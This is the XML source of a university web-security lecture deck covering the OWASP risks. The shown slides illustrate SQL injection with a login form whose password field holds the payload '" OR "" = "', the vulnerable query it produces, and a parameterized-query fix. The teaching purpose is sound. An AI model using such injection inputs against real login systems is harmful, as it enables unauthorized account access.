            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Password:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8591280" y="2631279"/>
              <a:ext cx="18263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Lars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8591280" y="3089129"/>
              <a:ext cx="1838849"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 OR " = "</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rounded Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9001703" y="3589365"/>
              <a:ext cx="1343552" cy="49094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Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Sign in!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rounded Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3361575" y="5717941"/>
            <a:ext cx="5036655" cy="112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2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT id FROM accounts WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" AND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>password = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" OR "" = "</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43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#1 Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="10515600" cy="2957220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/login', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(request, response){</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username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.body.username</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password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.body.password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> query = `SELECT id FROM members WHERE</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username = ? AND</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                   password = ?`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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db.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(query, [username, password], ...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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652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the hard way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Exploits of a Mom"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="77505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="998513" y="1690688"/>
            <a:ext cx="2293327" cy="31380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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3062228" y="4870558"/>
            <a:ext cx="6067541" cy="344069"/>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entonSans Medium" panose="0200060300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entonSans Regular" panose="0200050300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entonSans Regular" panose="0200050300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entonSans Regular" panose="0200050300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latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://xkcd.com/327/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="Exploits of a Mom">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87083A95-112F-4391-99DB-2FE1351A4C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323"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8371839" y="1690688"/>
            <a:ext cx="2821647" cy="3138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ploits of a Mom">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16A8FE61-0BCD-4DF9-83EA-03C5FAA16D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313" r="27677"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5720080" y="1690688"/>
            <a:ext cx="2651760" cy="31380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xploits of a Mom">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4376DB9-B1AA-4EF4-80D5-07EBDABA1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95" r="53687"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3291839" y="1690688"/>
            <a:ext cx="2428241" cy="313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Learning the hard way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472" y="1417865"/>
            <a:ext cx="6789056" cy="5091793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416235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U Grå">
  <a:themeElements>
    <a:clrScheme name="JU">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="003865"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EBEBDF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="961B81"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FFB500"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="003865"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="EBEBDF"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="009CDE"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="007A33"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="EBEBDF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="961B81"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Custom 1">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28867</TotalTime>
  <Words>2947</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>478</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Georgia</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>JU Grå</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Common security vulnerabilities</vt:lpstr>
      <vt:lpstr>#1 Injection</vt:lpstr>
      <vt:lpstr>#1 Injection</vt:lpstr>
      <vt:lpstr>#1 Injection</vt:lpstr>
      <vt:lpstr>#1 Injection</vt:lpstr>
      <vt:lpstr>Learning the hard way</vt:lpstr>
      <vt:lpstr>Learning the hard way</vt:lpstr>
      <vt:lpstr>#1 Injection Real examples</vt:lpstr>
      <vt:lpstr>#2 Broken Authentication</vt:lpstr>
      <vt:lpstr>#2 Broken Authentication</vt:lpstr>
      <vt:lpstr>#2 Broken Authentication examples </vt:lpstr>
      <vt:lpstr>#3 Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>#3 Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>Encryption</vt:lpstr>
      <vt:lpstr>Asymmetric encryption</vt:lpstr>
      <vt:lpstr>Man-in-the-middle attack</vt:lpstr>
      <vt:lpstr>Man-in-the-middle attack</vt:lpstr>
      <vt:lpstr>How it works in practice</vt:lpstr>
      <vt:lpstr>Distributing the encryption keys</vt:lpstr>
      <vt:lpstr>Distributing the encryption keys</vt:lpstr>
      <vt:lpstr>Enable HTTPS on your website</vt:lpstr>
      <vt:lpstr>Enable HTTPS on your website</vt:lpstr>
      <vt:lpstr>#3 Sensitive data exposure Examples</vt:lpstr>
      <vt:lpstr>#5 Broken Access Control</vt:lpstr>
      <vt:lpstr>#5 Broken Access Control</vt:lpstr>
      <vt:lpstr>#5 Broken Access Control</vt:lpstr>
      <vt:lpstr>#5 Broken Access Control example</vt:lpstr>
      <vt:lpstr>#6 Security Misconfiguration</vt:lpstr>
      <vt:lpstr>#6 Security Misconfiguration</vt:lpstr>
      <vt:lpstr>#6 Security Misconfigurations example</vt:lpstr>
      <vt:lpstr>#7 Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>#7 Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>#7 Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>#7 Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>#7 Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>#7 Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>#7 Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Preventing XSS</vt:lpstr>
      <vt:lpstr>#7 Cross-Site Scripting (XSS) example</vt:lpstr>
      <vt:lpstr>#8 2013 - Cross-site request forgery</vt:lpstr>
      <vt:lpstr>#8 2013 - Cross-site request forgery</vt:lpstr>
      <vt:lpstr>#8 2013 - Cross-site request forgery</vt:lpstr>
      <vt:lpstr>#8 2013 - Cross-site request forgery</vt:lpstr>
      <vt:lpstr>#8 2013 - Cross-site request forgery</vt:lpstr>
      <vt:lpstr>Preventing CSRF</vt:lpstr>
      <vt:lpstr>Preventing CSRF</vt:lpstr>
      <vt:lpstr>Preventing CSRF</vt:lpstr>
      <vt:lpstr>Preventing CSRF</vt:lpstr>
      <vt:lpstr>Preventing CSRF</vt:lpstr>
      <vt:lpstr>Preventing CSRF in Express</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Jönköping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Oskar Pollack</dc:creator>
  <cp:lastModifiedBy>Peter Larsson-Green</cp:lastModifiedBy>
  <cp:revision>445</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-07-17T09:22:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-03T17:23:07Z</dcterms:modified>
</cp:coreProperties>
</file>